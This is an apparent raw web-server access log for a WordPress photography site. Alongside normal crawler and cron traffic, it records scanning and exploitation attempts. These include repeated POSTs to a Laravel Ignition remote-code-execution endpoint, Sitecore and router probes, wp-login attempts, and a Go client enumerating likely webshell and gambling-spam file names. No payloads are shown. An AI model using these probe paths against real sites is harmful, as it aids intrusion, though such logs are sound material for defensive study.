20.171.207.254 - - [18/Oct/2025:09:57:43 -0400] "GET /products60924314?kg=0060181416 HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
51.79.229.86 - - [18/Oct/2025:09:57:32 -0400] "GET /togel.php HTTP/1.1" 503 854 "http://salhab360photos.com/togel.php" "Go-http-client/2.0"
66.249.64.106 - - [18/Oct/2025:09:58:31 -0400] "GET /categories/12805162 HTTP/1.1" 200 29146 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
157.20.32.210 - - [18/Oct/2025:09:59:23 -0400] "POST /v1/backend1 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
157.20.32.210 - - [18/Oct/2025:09:59:25 -0400] "GET /index.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
157.20.32.210 - - [18/Oct/2025:09:59:32 -0400] "GET /v1/34EYbPqBQPFaplEpY84g5g9ZvoE.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36"
157.20.32.210 - - [18/Oct/2025:09:59:40 -0400] "POST /homeaction.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.10240"
157.20.32.210 - - [18/Oct/2025:09:59:43 -0400] "GET /v1/34EYbPqBQPFaplEpY84g5g9ZvoE.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36"
157.20.32.210 - - [18/Oct/2025:09:59:49 -0400] "GET /index.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
157.20.32.210 - - [18/Oct/2025:09:59:56 -0400] "GET /v1/34EYbPqBQPFaplEpY84g5g9ZvoE.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36"
157.20.32.210 - - [18/Oct/2025:10:00:04 -0400] "POST /index.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (SS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36"
157.20.32.210 - - [18/Oct/2025:10:00:15 -0400] "POST /TransferredOutModal.php?modfunc=detail HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15"
157.20.32.210 - - [18/Oct/2025:10:00:15 -0400] "POST /index.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (SS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36"
157.20.32.210 - - [18/Oct/2025:10:00:28 -0400] "POST /TransferredOutModal.php?modfunc=detail HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15"
157.20.32.210 - - [18/Oct/2025:10:00:28 -0400] "POST /index.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (SS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36"
157.20.32.210 - - [18/Oct/2025:10:00:38 -0400] "POST /TransferredOutModal.php?modfunc=detail HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15"
157.20.32.210 - - [18/Oct/2025:10:00:38 -0400] "POST /index.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (SS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36"
20.171.207.254 - - [18/Oct/2025:09:59:47 -0400] "GET /products60900826?kg=0060158216 HTTP/1.1" 503 854 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
157.20.32.210 - - [18/Oct/2025:09:59:58 -0400] "POST /_ignition/execute-solution HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.3 Safari/605.1.15"
157.20.32.210 - - [18/Oct/2025:09:59:53 -0400] "POST /homeaction.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.10240"
157.20.32.210 - - [18/Oct/2025:10:00:01 -0400] "POST /_ignition/execute-solution HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2486.0 Safari/537.36 Edge/13.10586"
157.20.32.210 - - [18/Oct/2025:10:00:04 -0400] "POST /_ignition/execute-solution HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Safari/537.36"
157.20.32.210 - - [18/Oct/2025:10:00:04 -0400] "POST /TransferredOutModal.php?modfunc=detail HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15"
89.21.85.28 - - [18/Oct/2025:09:59:59 -0400] "GET /file-manager/ckeditor HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36"
157.20.32.210 - - [18/Oct/2025:10:00:15 -0400] "POST /_ignition/execute-solution HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Safari/537.36"
157.20.32.210 - - [18/Oct/2025:10:00:28 -0400] "POST /_ignition/execute-solution HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Safari/537.36"
51.79.229.86 - - [18/Oct/2025:09:59:29 -0400] "GET /agenttogel.php HTTP/1.1" 503 854 "http://salhab360photos.com/agenttogel.php" "Go-http-client/2.0"
157.20.32.210 - - [18/Oct/2025:10:00:36 -0400] "POST /_ignition/execute-solution HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Knoppix; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36"
157.20.32.210 - - [18/Oct/2025:10:01:08 -0400] "POST /_ignition/execute-solution HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (X11; Linux i686; rv:1.9.7.20) Gecko/ Firefox/3.6.13"
157.20.32.210 - - [18/Oct/2025:10:01:22 -0400] "POST /_ignition/execute-solution HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.4 Safari/605.1.15"
157.20.32.210 - - [18/Oct/2025:10:01:35 -0400] "POST /_ignition/execute-solution HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.4 Safari/605.1.15"
216.73.216.159 - - [18/Oct/2025:10:01:47 -0400] "GET /products239676616?kg=0236753813 HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
51.79.229.86 - - [18/Oct/2025:10:00:43 -0400] "GET /viva.php HTTP/1.1" 503 854 "http://salhab360photos.com/viva.php" "Go-http-client/2.0"
66.249.64.106 - - [18/Oct/2025:10:02:06 -0400] "GET /products13150340?kg=0012990051 HTTP/1.1" 200 29319 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
20.171.207.254 - - [18/Oct/2025:10:01:52 -0400] "GET /products60906972?kg=0060164287 HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
157.20.32.210 - - [18/Oct/2025:10:02:55 -0400] "POST /sitecore/shell/ClientBin/Reporting/Report.ashx HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0"
157.20.32.210 - - [18/Oct/2025:10:00:47 -0400] "POST /_ignition/execute-solution HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Knoppix; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36"
157.20.32.210 - - [18/Oct/2025:10:01:00 -0400] "POST /_ignition/execute-solution HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Knoppix; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36"
20.171.207.254 - - [18/Oct/2025:10:00:47 -0400] "GET /products60911486?kg=0060168746 HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
157.20.32.210 - - [18/Oct/2025:10:01:11 -0400] "POST /_ignition/execute-solution HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.4 Safari/605.1.15"
216.73.216.159 - - [18/Oct/2025:10:01:59 -0400] "GET /products56713090?kg=0056021548 HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.64.105 - - [18/Oct/2025:10:02:09 -0400] "GET /products5035324?kg=0004973999 HTTP/1.1" 200 28943 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
51.79.229.86 - - [18/Oct/2025:10:02:04 -0400] "GET /poker.php HTTP/1.1" 503 854 "http://salhab360photos.com/poker.php" "Go-http-client/2.0"
157.20.32.210 - - [18/Oct/2025:10:03:19 -0400] "POST /sitecore/shell/ClientBin/Reporting/Report.ashx HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0"
185.61.153.107 - - [18/Oct/2025:10:03:37 -0400] "POST /wp-cron.php?doing_wp_cron=1760796217.8723239898681640625000 HTTP/1.1" 200 0 "-" "WordPress/6.8.3; https://salhab360photos.com"
185.61.153.107 - - [18/Oct/2025:10:03:38 -0400] "POST /wp-cron.php?doing_wp_cron=1760796217.8723309040069580078125 HTTP/1.1" 200 0 "-" "WordPress/6.8.3; https://salhab360photos.com"
51.79.229.86 - - [18/Oct/2025:10:03:14 -0400] "GET /vivaslot.php HTTP/1.1" 404 10906 "http://salhab360photos.com/vivaslot.php" "Go-http-client/2.0"
51.79.229.86 - - [18/Oct/2025:10:03:40 -0400] "GET /xox2.php HTTP/1.1" 404 10902 "http://salhab360photos.com/xox2.php" "Go-http-client/2.0"
51.79.229.86 - - [18/Oct/2025:10:03:52 -0400] "GET /Negat1ve.php HTTP/1.1" 404 10905 "http://salhab360photos.com/Negat1ve.php" "Go-http-client/2.0"
20.171.207.254 - - [18/Oct/2025:10:03:55 -0400] "GET /products60889350?kg=0060146878 HTTP/1.1" 404 9740 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
58.64.45.45 - - [18/Oct/2025:10:04:08 -0400] "GET /wp-login.php HTTP/1.1" 200 2082 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko"
51.79.229.86 - - [18/Oct/2025:10:04:28 -0400] "GET /foreigninvestment.php HTTP/1.1" 404 10903 "http://salhab360photos.com/foreigninvestment.php" "Go-http-client/2.0"
51.79.229.86 - - [18/Oct/2025:10:04:30 -0400] "GET /fetch.php HTTP/1.1" 404 10898 "http://salhab360photos.com/fetch.php" "Go-http-client/2.0"
51.79.229.86 - - [18/Oct/2025:10:04:33 -0400] "GET /labor.php HTTP/1.1" 404 10905 "http://salhab360photos.com/labor.php" "Go-http-client/2.0"
51.79.229.86 - - [18/Oct/2025:10:04:36 -0400] "GET /strength.php HTTP/1.1" 404 10906 "http://salhab360photos.com/strength.php" "Go-http-client/2.0"
51.79.229.86 - - [18/Oct/2025:10:04:40 -0400] "GET /tj0xp5wy.php HTTP/1.1" 404 10905 "http://salhab360photos.com/tj0xp5wy.php" "Go-http-client/2.0"
51.79.229.86 - - [18/Oct/2025:10:04:43 -0400] "GET /mission.php HTTP/1.1" 404 10901 "http://salhab360photos.com/mission.php" "Go-http-client/2.0"
51.79.229.86 - - [18/Oct/2025:10:04:57 -0400] "GET /yuuki2.php HTTP/1.1" 404 10905 "http://salhab360photos.com/yuuki2.php" "Go-http-client/2.0"
157.20.32.210 - - [18/Oct/2025:10:03:06 -0400] "POST /sitecore/shell/ClientBin/Reporting/Report.ashx HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0"
20.171.207.254 - - [18/Oct/2025:10:02:54 -0400] "GET /products60936122?kg=0060193080 HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
185.61.153.107 - - [18/Oct/2025:10:03:37 -0400] "POST /wp-cron.php?doing_wp_cron=1760796217.8724730014801025390625 HTTP/1.1" 200 0 "-" "WordPress/6.8.3; https://salhab360photos.com"
185.61.153.107 - - [18/Oct/2025:10:03:37 -0400] "POST /wp-cron.php?doing_wp_cron=1760796217.8722529411315917968750 HTTP/1.1" 200 0 "-" "WordPress/6.8.3; https://salhab360photos.com"
185.61.153.107 - - [18/Oct/2025:10:03:39 -0400] "POST /wp-cron.php?doing_wp_cron=1760796219.5679678916931152343750 HTTP/1.1" 200 0 "-" "WordPress/6.8.3; https://salhab360photos.com"
92.222.108.115 - - [18/Oct/2025:10:03:11 -0400] "GET /products218738070?kg=0216070614 HTTP/1.1" 404 9741 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
66.249.64.105 - - [18/Oct/2025:10:03:46 -0400] "GET /products13647834?kg=0013481480 HTTP/1.1" 200 29088 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
51.79.229.86 - - [18/Oct/2025:10:03:50 -0400] "GET /uno.php HTTP/1.1" 404 10903 "http://salhab360photos.com/uno.php" "Go-http-client/2.0"
51.79.229.86 - - [18/Oct/2025:10:04:02 -0400] "GET /core3.php HTTP/1.1" 404 10899 "http://salhab360photos.com/core3.php" "Go-http-client/2.0"
51.79.229.86 - - [18/Oct/2025:10:04:06 -0400] "GET /intrud3r.php HTTP/1.1" 404 10897 "http://salhab360photos.com/intrud3r.php" "Go-http-client/2.0"
51.79.229.86 - - [18/Oct/2025:10:04:09 -0400] "GET /locale.php HTTP/1.1" 404 10903 "http://salhab360photos.com/locale.php" "Go-http-client/2.0"
185.61.153.107 - - [18/Oct/2025:10:04:18 -0400] "POST /wp-cron.php?doing_wp_cron=1760796258.6677269935607910156250 HTTP/1.1" 200 0 "-" "WordPress/6.8.3; https://salhab360photos.com"
51.79.229.86 - - [18/Oct/2025:10:04:14 -0400] "GET /jasmine.php HTTP/1.1" 404 10894 "http://salhab360photos.com/jasmine.php" "Go-http-client/2.0"
58.64.45.45 - - [18/Oct/2025:10:04:17 -0400] "POST /wp-login.php HTTP/1.1" 200 2174 "https://salhab360photos.com/wp-login.php" "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko"
51.79.229.86 - - [18/Oct/2025:10:04:20 -0400] "GET /fundraising.php HTTP/1.1" 404 10903 "http://salhab360photos.com/fundraising.php" "Go-http-client/2.0"
157.20.32.210 - - [18/Oct/2025:10:04:33 -0400] "GET /?rest_route=/wp/v2/posts HTTP/1.1" 200 1404 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:126.0) Gecko/20100101 Firefox/126.0"
157.20.32.210 - - [18/Oct/2025:10:04:33 -0400] "GET /wp-json/wp/v2/posts HTTP/1.1" 200 105592 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.1 Safari/605.1.15"
157.20.32.210 - - [18/Oct/2025:10:04:41 -0400] "POST /wp-admin/admin-ajax.php HTTP/1.1" 400 21 "-" "Mozilla/5.0 (Knoppix; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36"
51.79.229.86 - - [18/Oct/2025:10:04:47 -0400] "GET /campaign.php HTTP/1.1" 404 10904 "http://salhab360photos.com/campaign.php" "Go-http-client/2.0"
51.79.229.86 - - [18/Oct/2025:10:04:49 -0400] "GET /ws0fg.php HTTP/1.1" 404 10905 "http://salhab360photos.com/ws0fg.php" "Go-http-client/2.0"
20.171.207.254 - - [18/Oct/2025:10:04:56 -0400] "GET /products60881314?kg=0060138940 HTTP/1.1" 404 9742 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
51.79.229.86 - - [18/Oct/2025:10:05:00 -0400] "GET /SbGopHLhMOc.php HTTP/1.1" 404 10896 "http://salhab360photos.com/SbGopHLhMOc.php" "Go-http-client/2.0"
66.249.64.106 - - [18/Oct/2025:10:05:02 -0400] "GET /products8908184?kg=0008799629 HTTP/1.1" 200 28907 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
35.179.127.116 - - [18/Oct/2025:10:05:05 -0400] "GET / HTTP/1.1" 200 1404 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 17_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0 Mobile/15E148 Safari/604.1 RDDocuments/8.4.8.940"
206.189.247.132 - - [18/Oct/2025:10:05:05 -0400] "GET / HTTP/1.1" 200 1404 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 17_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0 Mobile/15E148 Safari/604.1 RDDocuments/8.4.8.940"
51.79.229.86 - - [18/Oct/2025:10:05:03 -0400] "GET /ict.php HTTP/1.1" 404 10903 "http://salhab360photos.com/ict.php" "Go-http-client/2.0"
138.68.166.157 - - [18/Oct/2025:10:05:12 -0400] "GET / HTTP/1.1" 200 1404 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 17_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0 Mobile/15E148 Safari/604.1 RDDocuments/8.4.8.940"
185.61.153.107 - - [18/Oct/2025:10:05:14 -0400] "POST /wp-cron.php?doing_wp_cron=1760796314.4699680805206298828125 HTTP/1.1" 200 0 "-" "WordPress/6.8.3; https://salhab360photos.com"
51.79.229.86 - - [18/Oct/2025:10:05:15 -0400] "GET /deposit.php HTTP/1.1" 404 10905 "http://salhab360photos.com/deposit.php" "Go-http-client/2.0"
216.73.216.159 - - [18/Oct/2025:10:05:35 -0400] "GET /products83732546?kg=0082711500 HTTP/1.1" 404 9742 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
157.20.32.210 - - [18/Oct/2025:10:05:36 -0400] "POST /cgi?7 HTTP/1.1" 404 10853 "http://salhab360photos.com/mainFrame.htm" "Mozilla/5.0 (Knoppix; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36"
51.79.229.86 - - [18/Oct/2025:10:05:36 -0400] "GET /bonanza.php HTTP/1.1" 404 10899 "http://salhab360photos.com/bonanza.php" "Go-http-client/2.0"
216.73.216.159 - - [18/Oct/2025:10:05:38 -0400] "GET /products32049618?kg=0031658852 HTTP/1.1" 404 9742 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
51.79.229.86 - - [18/Oct/2025:10:05:47 -0400] "GET /casino.php HTTP/1.1" 404 10899 "http://salhab360photos.com/casino.php" "Go-http-client/2.0"
51.79.229.86 - - [18/Oct/2025:10:05:51 -0400] "GET /ag.php HTTP/1.1" 404 10903 "http://salhab360photos.com/ag.php" "Go-http-client/2.0"
66.249.64.106 - - [18/Oct/2025:10:05:56 -0400] "GET /products12028872?kg=0011882261 HTTP/1.1" 200 28710 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
20.171.207.254 - - [18/Oct/2025:10:06:01 -0400] "GET /products60905956?kg=0060163283 HTTP/1.1" 404 9733 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
51.79.229.86 - - [18/Oct/2025:10:06:01 -0400] "GET /member.php HTTP/1.1" 404 10903 "http://salhab360photos.com/member.php" "Go-http-client/2.0"
185.61.153.107 - - [18/Oct/2025:10:06:16 -0400] "POST /wp-cron.php?doing_wp_cron=1760796376.7795469760894775390625 HTTP/1.1" 200 0 "-" "WordPress/6.8.3; https://salhab360photos.com"
51.79.229.86 - - [18/Oct/2025:10:06:14 -0400] "GET /Windows.php HTTP/1.1" 404 10897 "http://salhab360photos.com/Windows.php" "Go-http-client/2.0"
51.79.229.86 - - [18/Oct/2025:10:06:17 -0400] "GET /777slots.php HTTP/1.1" 404 10902 "http://salhab360photos.com/777slots.php" "Go-http-client/2.0"
51.79.229.86 - - [18/Oct/2025:10:06:24 -0400] "GET /win.php HTTP/1.1" 404 10903 "http://salhab360photos.com/win.php" "Go-http-client/2.0"
51.79.229.86 - - [18/Oct/2025:10:06:26 -0400] "GET /winner.php HTTP/1.1" 404 10903 "http://salhab360photos.com/winner.php" "Go-http-client/2.0"
51.79.229.86 - - [18/Oct/2025:10:05:08 -0400] "GET /deposite.php HTTP/1.1" 404 10899 "http://salhab360photos.com/deposite.php" "Go-http-client/2.0"
51.79.229.86 - - [18/Oct/2025:10:05:13 -0400] "GET /depo.php HTTP/1.1" 404 10903 "http://salhab360photos.com/depo.php" "Go-http-client/2.0"
51.79.229.86 - - [18/Oct/2025:10:05:20 -0400] "GET /pembayaran.php HTTP/1.1" 404 10898 "http://salhab360photos.com/pembayaran.php" "Go-http-client/2.0"
51.79.229.86 - - [18/Oct/2025:10:05:22 -0400] "GET /via.php HTTP/1.1" 404 10896 "http://salhab360photos.com/via.php" "Go-http-client/2.0"
216.73.216.159 - - [18/Oct/2025:10:05:23 -0400] "GET /products146514370?kg=0144727692 HTTP/1.1" 404 9740 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
157.20.32.210 - - [18/Oct/2025:10:05:24 -0400] "POST /cgi?2 HTTP/1.1" 404 10856 "http://salhab360photos.com/mainFrame.htm" "Mozilla/5.0 (Macintosh, Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Safari/605.1.15"
51.79.229.86 - - [18/Oct/2025:10:05:27 -0400] "GET /banking.php HTTP/1.1" 404 10897 "http://salhab360photos.com/banking.php" "Go-http-client/2.0"
216.73.216.159 - - [18/Oct/2025:10:05:29 -0400] "GET /products22770612?kg=0022493003 HTTP/1.1" 404 9740 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
51.79.229.86 - - [18/Oct/2025:10:05:33 -0400] "GET /atm.php HTTP/1.1" 404 10905 "http://salhab360photos.com/atm.php" "Go-http-client/2.0"
51.79.229.86 - - [18/Oct/2025:10:05:41 -0400] "GET /primordial.php HTTP/1.1" 404 10906 "http://salhab360photos.com/primordial.php" "Go-http-client/2.0"
51.79.229.86 - - [18/Oct/2025:10:05:45 -0400] "GET /7iblis.php HTTP/1.1" 404 10906 "http://salhab360photos.com/7iblis.php" "Go-http-client/2.0"
51.79.229.86 - - [18/Oct/2025:10:05:49 -0400] "GET /casino88.php HTTP/1.1" 404 10896 "http://salhab360photos.com/casino88.php" "Go-http-client/2.0"
51.79.229.86 - - [18/Oct/2025:10:05:54 -0400] "GET /agata.php HTTP/1.1" 404 10897 "http://salhab360photos.com/agata.php" "Go-http-client/2.0"
51.79.229.86 - - [18/Oct/2025:10:05:56 -0400] "GET /agent.php HTTP/1.1" 404 10903 "http://salhab360photos.com/agent.php" "Go-http-client/2.0"
51.79.229.86 - - [18/Oct/2025:10:05:59 -0400] "GET /agentjudi.php HTTP/1.1" 404 10902 "http://salhab360photos.com/agentjudi.php" "Go-http-client/2.0"
51.79.229.86 - - [18/Oct/2025:10:06:05 -0400] "GET /bonus.php HTTP/1.1" 404 10896 "http://salhab360photos.com/bonus.php" "Go-http-client/2.0"
51.79.229.86 - - [18/Oct/2025:10:06:08 -0400] "GET /jackpot.php HTTP/1.1" 404 10903 "http://salhab360photos.com/jackpot.php" "Go-http-client/2.0"
51.79.229.86 - - [18/Oct/2025:10:06:10 -0400] "GET /agentslot.php HTTP/1.1" 404 10905 "http://salhab360photos.com/agentslot.php" "Go-http-client/2.0"
51.79.229.86 - - [18/Oct/2025:10:06:12 -0400] "GET /777slot.php HTTP/1.1" 404 10899 "http://salhab360photos.com/777slot.php" "Go-http-client/2.0"
51.79.229.86 - - [18/Oct/2025:10:06:22 -0400] "GET /500x.php HTTP/1.1" 404 10903 "http://salhab360photos.com/500x.php" "Go-http-client/2.0"
157.20.32.210 - - [18/Oct/2025:10:06:27 -0400] "GET / HTTP/1.1" 200 1404 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Safari/605.1.15"
51.79.229.86 - - [18/Oct/2025:10:06:30 -0400] "GET /slotjoker.php HTTP/1.1" 404 10897 "http://salhab360photos.com/slotjoker.php" "Go-http-client/2.0"
51.79.229.86 - - [18/Oct/2025:10:06:32 -0400] "GET /slotonline.php HTTP/1.1" 404 10903 "http://salhab360photos.com/slotonline.php" "Go-http-client/2.0"
51.79.229.86 - - [18/Oct/2025:10:06:34 -0400] "GET /88fortunes.php HTTP/1.1" 404 10903 "http://salhab360photos.com/88fortunes.php" "Go-http-client/2.0"
98.70.29.56 - - [18/Oct/2025:10:06:35 -0400] "POST /wp-login.php HTTP/1.1" 200 6564 "-" "Mozilla/5.0"
51.79.229.86 - - [18/Oct/2025:10:06:41 -0400] "GET /lots.php HTTP/1.1" 404 10899 "http://salhab360photos.com/lots.php" "Go-http-client/2.0"
51.79.229.86 - - [18/Oct/2025:10:06:28 -0400] "GET /slotbca.php HTTP/1.1" 404 10899 "http://salhab360photos.com/slotbca.php" "Go-http-client/2.0"
51.79.229.86 - - [18/Oct/2025:10:06:36 -0400] "GET /88fortunesslots.php HTTP/1.1" 404 10902 "http://salhab360photos.com/88fortunesslots.php" "Go-http-client/2.0"
51.79.229.86 - - [18/Oct/2025:10:06:39 -0400] "GET /slots.php HTTP/1.1" 404 10899 "http://salhab360photos.com/slots.php" "Go-http-client/2.0"
51.79.229.86 - - [18/Oct/2025:10:06:44 -0400] "GET /lot.php HTTP/1.1" 404 10903 "http://salhab360photos.com/lot.php" "Go-http-client/2.0"
157.20.32.210 - - [18/Oct/2025:10:06:51 -0400] "GET / HTTP/1.1" 200 1404 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0"
